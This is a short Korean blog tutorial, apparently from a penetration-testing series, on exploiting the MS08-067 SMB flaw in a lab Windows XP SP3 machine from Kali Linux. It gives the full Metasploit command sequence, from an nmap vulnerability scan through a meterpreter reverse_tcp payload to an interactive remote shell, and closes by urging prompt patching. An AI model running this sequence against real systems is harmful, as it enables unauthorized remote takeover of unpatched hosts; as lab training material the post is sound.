환경
Attacker
Kali Linux 1.0.6 64 bit
Target
Windows XP Professional K Service Pack 3(Clean Install)
Firewall Disable(결과를 좀 더 많이 보기 위해?)
Metasploit을 이용한 취약점 공격 (msfconsole)
msfconsole에서 nmap script 옵션을 사용하기 위하여 정보 얻기
- nmap -sT -A --script=smb-check-vulns -p0 192.168.181.177
모듈 검색
- search ms08_067
모듈 사용 및 PAYLOAD 설정
- use exploit/windows/smb/ms08_067_netapi
- set PAYLOAD windows/meterpreter/reverse_tcp
Target 정보 확인
- show targets
공격하기 위한 설정 진행
- set TARGET 54
- set RHOST 192.168.181.177
- set LHOST 192.168.181.178
- set LPORT 8888
- show options
공격 수행
- exploit -z
- sessions -l
- sessions -i 1
- shell
metasploit에 존재하는 모듈을 이용하여 XP의 shell을 얻어오는 것을 확인할 수 있다. 취약점을 알고 있는 사람은 누구나 쉽게 공격을 수행할 수 있으니 빠른 패치를 권장한다.
'System Hacking > Pentest Framework' 카테고리의 다른 글
| [Nessus] Nessus를 이용한 취약점 스캐닝 및 침투 수행 기본 - (2) 기본적인 취약점 스캐닝 (0) | 2015.04.02 |
|---|---|
| [Nessus] Nessus를 이용한 취약점 스캐닝 및 침투 수행 기본 - (1) Nessus 설치 및 초기화 (0) | 2015.04.02 |
